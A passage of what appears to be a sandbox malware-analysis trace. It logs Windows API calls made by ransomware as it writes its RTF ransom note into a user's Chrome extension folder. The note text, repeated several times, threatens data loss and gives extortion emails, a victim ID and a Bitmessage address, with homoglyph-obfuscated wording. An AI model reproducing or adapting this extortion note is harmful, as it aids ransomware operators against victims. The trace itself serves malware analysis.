find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.326] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nÀv¤Aô\x81éwª1\x9c`\x8fºÊ\x11òÜ\"\x8dP-?Ó\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.326] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.327] CloseHandle (hObject=0x294) returned 1 [0285.327] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\#readme_eman#.rtf")) returned 0xffffffff [0285.327] GetLastError () returned 0x2 [0285.327] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 